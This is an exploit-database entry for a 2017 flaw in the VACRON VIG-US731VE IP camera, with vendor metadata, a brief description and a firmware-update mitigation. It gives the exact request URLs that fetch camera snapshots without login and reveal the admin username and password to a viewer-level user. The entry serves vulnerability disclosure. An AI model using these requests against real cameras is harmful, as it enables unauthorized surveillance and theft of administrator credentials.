header-logo
Suggest Exploit
vendor:
VIG-US731VE
by:
anonymous
8,8
CVSS
HIGH
Credential Disclosure
200
CWE
Product Name: VIG-US731VE
Affected Version From: V1.0.18-09-B727
Affected Version To: V1.0.18-09-B727
Patch Exists: YES
Related CWE: N/A
CPE: h:vacron:vig-us731ve
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2017

IP Camera VACRON VIG-US731VE

This exploit allows an attacker to fetch a snapshot from the IP Camera VACRON VIG-US731VE without requiring credentials. It also allows a 'viewer' level user to fetch any camera setting, including the admin user and password.

Mitigation:

Update to the latest firmware version available from the vendor.
Source

Exploit-DB raw data:

# Exploit Title: IP Camera VACRON VIG-US731VE
# Date: 2017-07-18
# Exploit Author: anonymous
# Vendor Homepage: www.vacron.com
# Version: V1.0.18-09-B727

1. doesn't require credentials to fetch snapshot like this: http://192.168.0.200/ipcam/jpeg
2. allows "viewer" level user to fetch any camera setting, eg admin user and password: http://192.168.0.200/vb.htm?adminid&adminpwd


there is newer firmware available from the vendor, but I haven't tested on that one.

Navigation

Suggest Exploit

Services By CQR